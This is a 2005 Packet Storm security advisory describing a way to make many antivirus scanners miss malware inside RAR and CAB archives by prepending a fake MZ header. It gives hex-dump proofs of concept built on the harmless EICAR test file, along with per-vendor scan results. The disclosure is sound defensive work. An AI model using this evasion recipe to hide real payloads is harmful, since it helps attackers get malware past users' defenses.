AVCraftedArchive.txt

2005-10-08T00:00:00
ID PACKETSTORM:40515
Type packetstorm
Reporter fRoGGz
Modified 2005-10-08T00:00:00

Description

                                        
                                            `-=====================================================================-  
  
Release Date : 2005-10-05  
Tested on: Windows 2000 SP2 & SP4  
Tested with: Jotti Online Antivirus Scanner  
Tested with: VirusTotal Online Antivirus Scanner  
Tested with: Command line freeware UnRAR v3.50  
Tested with: PowerZip v7.06  
  
Affected Products:  
* Kaspersky Antivirus  
* BitDefender Antivirus  
* NOD32 Antivirus  
* F-Prot Antivirus  
* Avast Antivirus  
* McAfee Antivirus  
* Sophos Antivirus  
* Symantec Antivirus  
* Dr.Web Antivirus  
* Avira Antivirus  
* Norman Virus Control Antivirus  
* Fortinet Antivirus  
* VBA32 Antivirus  
* Rising Antivirus  
* AntiVir Antivirus  
* eTrust-Iris Antivirus  
* ArcaVir Antivirus  
* eTrust-Vet Antivirus  
* UNA Antivirus  
* Ikarus AntiVirus  
* ClamAV Antivirus  
* Panda Antivirus  
* CAT Quick Heal  
* TheHacker  
[+] May be others.....  
  
Not affected:  
* Only Grisoft AVG AntiVirus have found all PoC  
  
Discovered by: fRoGGz  
Credit to: SecuBox Labs  
Rated as : Medium  
  
-=====================================================================-  
  
Please, read this first.  
________________________  
  
Carefull, it's different than CAN-2004-0932 & CAN-2004-0937 !  
Security Focus bid: 11448  
  
Different than vulnerabilty reported by Thierry Zoller & discovered by Dr. Peter Bieringer.  
Security Focus bid: 12793  
  
[ Why ? ]  
  
[+] Scanning EICAR.zip ... <- (eicar.com is inside)  
[-] Writing central header patch [0x00000016]  
[-] Writing local header patch [0x0000007F]  
[+] File scanning finished. EOF:16 ERR:0  
  
Scanned files  
  
X:\=>Master Boot Record 80 OK  
X:\=>Partition Boot 1 (primary) (active) OK  
X:\=>Master Boot Record 81 OK  
X:\=>Partition Boot 1 (primary) OK  
X:\SecuBox.Labs\Debug\EICAR.zip OK  
X:\SecuBox.Labs\Debug\EICAR.zip=>EICAR.com Infected EICAR-Test-File (not a virus)  
X:\SecuBox.Labs\EICAR.zip=>EICAR.com Deleted  
X:\SecuBox.Labs\EICAR.zip Update  
  
Ok ? So ... it's really different.  
  
-=====================================================================-  
  
Analysis  
__________  
  
Specially crafted archive containing a virus will pass  
through the antivirus system without detection.  
  
An attacker can compress a malicious payload and evade  
detection by some anti-virus software.  
  
The bypassed malicious content does not pose a risk until  
extracted from the RAR archive file. Malicious content  
will be detected and eliminated by your Antivirus.  
  
Contrary to Winzip or BitZipper which do not authorize the  
opening of the file, Winrar & PowerZip open & extract it.  
  
Possible formats are:  
/------------------------------------------------------------\  
*.RAR, *.ZIP, *.CAB, *.ARJ, *.LZH, *.ACE, *.TAR, *.GZ (GZIP)  
*.UUE, *.BZ2, *.JAR, *.ISO, *.7Z, *.Z  
\------------------------------------------------------------/  
  
Proof of Concept  
________________  
  
  
************ WARNING *****************  
We have used: eicar.com  
EICAR test is a 68 bytes file "detect" as if it were a virus.  
Read more about EICAR  
Notes:: For BitZipper & WinZip file is corrupted !  
************ WARNING *****************  
  
Compress file "eicar.com" with Winrar: eicar.rar  
-=====================================================================-  
00h: 52 61 72 21 1A 07 00 CF 90 73 00 00 0D 00 00 00 ; Rar!...Ï?s......  
10h: 00 00 00 00 D3 AD 74 20 90 2E 00 44 00 00 00 44 ; ....ӭt ?..D...D  
20h: 00 00 00 02 3C CF 51 68 EE A4 45 33 1D 30 09 00 ; ....<ÏQhî€E3.0..  
30h: 20 00 00 00 45 49 43 41 52 2E 63 6F 6D 00 F0 A0 ; ...EICAR.com.ð   
40h: CB 96 58 35 4F 21 50 25 40 41 50 5B 34 5C 50 5A ; Ë?X5O!P%@AP[4\PZ  
50h: 58 35 34 28 50 5E 29 37 43 43 29 37 7D 24 45 49 ; X54(P^)7CC)7}$EI  
60h: 43 41 52 2D 53 54 41 4E 44 41 52 44 2D 41 4E 54 ; CAR-STANDARD-ANT  
70h: 49 56 49 52 55 53 2D 54 45 53 54 2D 46 49 4C 45 ; IVIRUS-TEST-FILE  
80h: 21 24 48 2B 48 2A C4 3D 7B 00 40 07 00 ; !$H+H*Ä={.@..  
-=====================================================================-  
  
Malicious archive must start with a fake MZ header.  
Of course, we must test for create a valid archive file.  
  
-=====================================================================-  
Archive is correct :: No errors found during test operation  
-=====================================================================-  
UNRAR 3.50 freeware - Copyright (c) 1993-2004 Alexander Roshal  
Extracting from SecuBox_AVPoC2.rar  
Extracting EICAR.com OK  
All OK  
  
UNRAR 3.50 freeware - Copyright (c) 1993-2004 Alexander Roshal  
Testing archive SecuBox_AVPoC2.rar  
Testing EICAR.com OK  
All OK  
  
Note:: For PowerZip, only SecuBox_AVPoC2.rar is valid, not PoC n°1.  
-=====================================================================-  
  
Proof Of Concept N°1  
--------------------  
[e_magic][archive] >> Like this >> [4D5A][526172211A0700...]  
  
Results for: SecuBox_AVPoC1.rar  
_______________________________  
  
[?] AntiVir Found nothing  
[?] ArcaVir Found nothing  
[?] Avast Found nothing  
[!] AVG Antivirus Found EICAR_Test (+187)  
[!] BitDefender Found EICAR-Test-File (not a virus)  
[!] CAT-QuickHeal Found Eicar.Test  
[~] ClamAV Found nothing >> Suspect  
[?] Dr.Web Found nothing  
[?] eTrust-Iris Found nothing  
[?] eTrust-Vet Found nothing  
[!] Fortinet Found EICAR_TEST_FILE  
[?] F-Prot Antivirus Found nothing  
[!] Ikarus Found EICAR_Test  
[?] Kaspersky Anti-Virus Found nothing  
[?] McAfee Found nothing  
[?] NOD32 Found nothing  
[?] Norman Virus Control Found nothing  
[!] Panda Found Eicar.Mod  
[?] Sophos Found nothing  
[?] Symantec Found nothing  
[?] TheHacker Found nothing  
[?] UNA Found nothing  
[?] VBA32 Found nothing  
  
PoC n°1  
MD5: e907ab569a6ceed6233e33828032c8f4  
SHA1: 071ba79957b80b11b85bb05bdf00f2edb803f4bb  
  
-=====================================================================-  
  
Proof Of Concept N°2  
---------------------  
[e_magic] [e_cblp] [e_cp] [00+archive...]  
( 4D5A ) ( 5000 ) (0200) (00+52 61 72 21 1A 07 00 CF....  
  
Results for: SecuBox_AVPoC2.rar  
________________________________  
  
[?] AntiVir Found nothing  
[!] ArcaVir Found Eicar.Test  
[!] Avast Found EICAR Test-NOT!!  
[!] AVG Antivirus Found EICAR_Test  
[?] BitDefender Found nothing  
[!] CAT-QuickHeal Found Eicar.Test  
[~] ClamAV Found nothing >> Suspect  
[?] Dr.Web Found nothing  
[?] eTrust-Iris Found nothing  
[?] eTrust-Vet Found nothing  
[?] Fortinet Found nothing  
[?] F-Prot Antivirus Found nothing  
[?] Fortinet Found nothing  
[!] Ikarus Found EICAR_Test  
[?] Kaspersky Anti-Virus Found nothing  
[?] McAfee Found nothing  
[?] NOD32 Found nothing  
[?] Norman Virus Control Found nothing  
[!] Panda Found Eicar.Mod  
[!] Sophos EICAR-AV-Test  
[?] Symantec Found nothing  
[?] TheHacker Found nothing  
[?] UNA Found nothing  
[?] VBA32 Found nothing  
  
PoC n°2  
MD5: 757e6c7984028653c557d5b0bf5374fd  
SHA1: 438d119bae0eedca413f27958172523738889c75  
  
-=====================================================================-  
  
Proof Of Concept N°3  
---------------------  
[e_magic] [e_cblp] [e_cp] [00+archive...]  
( 4D5A ) ( 5000 ) (0200) (00+4D 53 43 46 00 00 00 00....  
  
Compress file "eicar.com" with Winrar: eicar.cab  
-=====================================================================-  
00h: 4D 53 43 46 00 00 00 00 96 00 00 00 00 00 00 00 ; MSCF....?.......  
10h: 2C 00 00 00 00 00 00 00 03 01 01 00 01 00 00 00 ; ,...............  
20h: 29 00 00 00 46 00 00 00 01 00 01 00 44 00 00 00 ; )...F.......D...  
30h: 00 00 00 00 00 00 47 33 F9 86 20 00 45 49 43 41 ; ......G3ù? .EICA  
40h: 52 2E 63 6F 6D 00 60 79 2E 6A 48 00 44 00 43 4B ; R.com.`y.jH.D.CK  
50h: 8B 30 F5 57 0C 50 75 70 0C 88 36 89 09 88 8A 30 ; ?0õW.Pup.?6?.??0  
60h: 35 D1 08 88 D3 34 77 76 D6 34 AF 55 71 F5 74 76 ; 5Ñ.?Ó4wvÖ4¯Uqõtv  
70h: 0C D2 0D 0E 71 F4 73 71 0C 72 D1 75 F4 0B F1 0C ; .Ò..qôsq.rÑuô.ñ.  
80h: F3 0C 0A 0D D6 0D 71 0D 0E D1 75 F3 F4 71 55 54 ; ó...Ö.q..ÑuóôqUT  
90h: F1 D0 F6 D0 02 00 ; ñÐöÐ..  
-=====================================================================-  
  
Results for: SecuBox_AVPoC3.cab  
________________________________  
  
[?] AntiVir Found nothing  
[?] ArcaVir Found nothing  
[?] Avast Found nothing  
[!] AVG Antivirus Found EICAR_Test  
[?] BitDefender Found nothing  
[?] CAT-QuickHeal Found nothing  
[?] ClamAV Found nothing  
[?] Dr.Web Found nothing  
[?] eTrust-Iris Found nothing  
[?] eTrust-Vet Found nothing  
[?] Fortinet Found nothing  
[?] F-Prot Antivirus Found nothing  
[?] Fortinet Found nothing  
[?] Ikarus Found nothing  
[?] Kaspersky Anti-Virus Found nothing  
[?] McAfee Found nothing  
[?] NOD32 Found nothing  
[?] Norman Virus Control Found nothing  
[?] Panda Found nothing  
[?] Sophos Found nothing  
[?] Symantec Found nothing  
[?] TheHacker Found nothing  
[?] UNA Found nothing  
[!] VBA32 Found EICAR-Test-File  
  
PoC n°3  
MD5: 621990887beb0cbca7a071d3006a7fdf  
SHA1: 3edd5b71eaa803d6cdffc181ceaaf9ad9b85cf31  
  
WARNING: Results are not verifiable at 100%  
PoC files were checked via VirusTotal & Jotti Online Antivirus Scanner  
  
-=====================================================================-  
  
[ unix analysis ]  
  
thot:~$ clamscan --no-summary SecuBox_AVPoC3.cab  
SecuBox_AVPoC3.cab: OK  
thot:~$ cabextract SecuBox_AVPoC3.cab  
Extracting cabinet: SecuBox_AVPoC3.cab  
extracting EICAR.com  
All done, no errors.  
thot:~$ clamscan --no-summary EICAR.com  
EICAR.com: Eicar-Test-Signature FOUND  
thot:~$  
  
thot:~$ clamscan -V  
ClamAV 0.87/1120/Fri Oct 7 13:06:49 2005  
  
CREDiTS  
---------------------  
SecuBox Labs - fRoGGz  
Greet's fly out to: Jordi Bosveld & VirusTotal  
  
-=====================================================================-  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
--   
___________________________________________________________  
Sign-up for Ads Free at Mail.com  
http://promo.mail.com/adsfreejump.htm  
`